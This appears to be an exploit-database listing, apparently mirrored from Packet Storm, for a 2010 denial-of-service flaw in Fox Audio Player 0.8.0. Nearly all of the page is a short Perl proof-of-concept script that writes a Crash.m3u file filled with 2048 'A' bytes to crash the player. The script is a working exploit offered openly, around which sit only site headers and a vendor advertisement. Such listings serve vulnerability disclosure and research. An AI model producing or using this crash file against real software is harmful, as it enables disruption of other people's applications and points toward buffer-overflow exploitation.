Lucene search

K

Fox Audio Player 0.8.0 Denial Of Service

๐Ÿ—“๏ธย 28 Sep 2010ย 00:00:00Reported byย 4n0nym0usTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 31ย Views

Fox Audio Player 0.8.0 Denial Of Service vulnerability in .m3u fil

Show more
Code
`#  
#########################################################################################  
# #  
# Title: Fox Audio Player 0.8.0 .m3u Denial of Service Vulnerability #  
# Author: 4n0nym0us (Arash Sa'adatfar) #  
# Developer: Leandro Nini #  
# #  
# Software Link: #  
# http://www.softpedia.com/get/Multimedia/Audio/Audio-Players/Fox-Audio-Player.shtml #  
# Tested On: Windows XP Sp3 32-bit / Windows 7 Ultimate 32-bit #  
# #  
#########################################################################################  
#  
#!/usr/bin/perl  
my $file= "Crash.m3u";  
my $junk= "\x41" x 2048;  
open($FILE,">$file");  
print $FILE $junk;  
print "\nCrash.m3u File Created successfully\n";  
close($FILE);  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
28 Sep 2010 00:00Current
0.3Low risk
Vulners AI Score0.3
31
.json
Report